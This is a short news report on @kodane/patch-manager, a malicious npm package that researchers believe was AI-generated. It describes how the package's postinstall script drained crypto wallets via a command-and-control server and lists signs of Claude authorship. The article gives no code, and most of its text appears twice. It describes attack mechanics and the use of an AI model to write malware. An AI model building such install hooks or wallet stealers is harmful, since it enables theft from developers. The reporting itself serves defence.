Safety specialists have discovered a malicious package in npm generated using AI and hiding malware for stealing crypto wallet data.
The package, called @kodane/patch-manager, allegedly offered "advanced license checking and registry optimization tools for high-performance Node.js applications." It was uploaded to npm on July 28, 2025, by a user nicknamed Kodane. The package has already been removed from the registry, but before it was removed, it was downloaded more than 1,500 times.
Researchers note that the malicious functions of the package were listed directly in its source code: there, the component for stealing cryptocurrency was called an "enhanced stealth wallet drainer."
The attack occurred through a postinstall script that was triggered after the package was installed. The script saved the payload to hidden directories on Windows, Linux, and macOS, then generated an infected machine ID and connected to the command and control server at sweeper-monitor-production.up.railway[.]app. At the time of analysis, this server only showed two infected devices.
Once infected, the malware scans the system for crypto wallet files and, if found, withdraws all funds to a hardcoded address on the Solana blockchain. Most transactions associated with this wallet are believed to have come from compromised wallets of users who installed the malicious package.
While crypto-stealing malware has been found in open source repositories before, @kodane/patch-manager is unique in that the researchers believe it was generated using Anthropic's Claude chatbot. The researchers list evidence to support this:
Experts say the incident shows that attackers are using AI to create increasingly sophisticated and dangerous malware.
The package, called @kodane/patch-manager, allegedly offered "advanced license checking and registry optimization tools for high-performance Node.js applications." It was uploaded to npm on July 28, 2025, by a user nicknamed Kodane. The package has already been removed from the registry, but before it was removed, it was downloaded more than 1,500 times.
Researchers note that the malicious functions of the package were listed directly in its source code: there, the component for stealing cryptocurrency was called an "enhanced stealth wallet drainer."
The attack occurred through a postinstall script that was triggered after the package was installed. The script saved the payload to hidden directories on Windows, Linux, and macOS, then generated an infected machine ID and connected to the command and control server at sweeper-monitor-production.up.railway[.]app. At the time of analysis, this server only showed two infected devices.
Once infected, the malware scans the system for crypto wallet files and, if found, withdraws all funds to a hardcoded address on the Solana blockchain. Most transactions associated with this wallet are believed to have come from compromised wallets of users who installed the malicious package.
While crypto-stealing malware has been found in open source repositories before, @kodane/patch-manager is unique in that the researchers believe it was generated using Anthropic's Claude chatbot. The researchers list evidence to support this:
- use of emoji;
- numerous log messages in the console, typical for JavaScript;
- well written descriptive comments in the code;
- README.md file, written in Claude's typical style;
- the tendency to refer to changes in code as "Enhanced".
Experts say the incident shows that attackers are using AI to create increasingly sophisticated and dangerous malware.